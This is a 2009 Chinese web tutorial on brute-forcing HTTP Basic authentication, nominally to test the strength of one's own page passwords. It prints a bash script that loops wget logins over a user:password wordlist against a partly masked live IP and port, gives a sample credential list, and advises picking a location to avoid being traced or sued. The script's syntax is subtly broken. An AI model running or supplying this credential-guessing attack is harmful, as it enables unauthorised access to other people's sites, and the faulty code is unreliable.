暴破HTTP验证检测页面口令强度

⊕ 网站首页 ⊕注册会员 ⊕ 本站免费电影 ⊕ 留言板 ⊕ 繁體中文

您现在的位置：陈鹏个人网站 >> 电脑应用 >> 网络应用 >> 网络安全 >> 正文

专题栏目

最新热门

最新推荐

相关文章

不支持FLV Silverlight
微软SilverLight增大推广
 替代Flash 微软Silverli
网站建设过程中常见的5个
 XHTML+CSS网页制作问题解
 容易混淆使用位置的XHTM
Linux系统下Lighttpd的安
 实用HTML文件的增强标记
 HTML表格使用从入门到精
 FIF:HTML内部主体标记(下

暴破HTTP验证检测页面口令强度

暴破HTTP验证检测页面口令强度

作者：陈鹏文章来源：eNet 点击数：更新时间：2009-9-11 23:26:31

首先，你总得有像样的字典吧。去国外网站上下Wordlist吧，或者自己写个简单的程序来生成字典。如果不会写程序，呵呵呵呵，那就下载字典生成程序吧。（不过网上下的wordlist，或者用网上下的字典生成程序生成的字典，好像都不好用）

　　其次，你总得有工具来运用字典干活吧。可以从网上下载工具，比如大名鼎鼎的brutus。运行时的界面如下：
　　

　　当然，也可以自己写工具。笔者就写了一个简单的脚本来干活：

　　#!/bin/bash

　　#

　　user_password_file=/root/wget_cracker_user_password

　　while read user_password ; do

　　user=$(user_password#:}

　　password=$(user_password%:}

　　wget -q -t 2 -T 15 --http-user=$user --http-password=$password -http://219.136.x.x:8080/tool.asp

　　if [ $? -eq 0 ] ; then

　　echo "OK I got an password: user: $user ; password: $password !"

　　exit 0

　　fi

　　done < $user_password_file

　　exit 0

　　-bash-3.00# cat wget_cracker_user_password

　　abc:adeeffaf

　　deff:afkafsasf

　　guest:affaewf

　　guest:guest

　　guest:afdasf

　　再次，你应该清楚：暴力破解不是SYN攻击，IP 欺骗是不可能的，你的老巢在哪里，受害者一眼就能看出来。所以，好好选择“狙击地”吧。搞不好会吃官司的哦。

　　最后，本人进行HTTP验证暴力破解，只是验证自己保护的WEB页面口令的强度，绝不会去给别人的网站添麻烦。切记。

热门推荐：

剖析备份个人数据十大注意事项

改变系统安全等级的十大建议

【责任编辑王凡】

文章录入：陈鹏责任编辑：陈鹏

上一篇文章：巧治Vista下U盘自动运行病毒方法

下一篇文章：网页代码中的“隐形杀手”分类

【字体：小大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】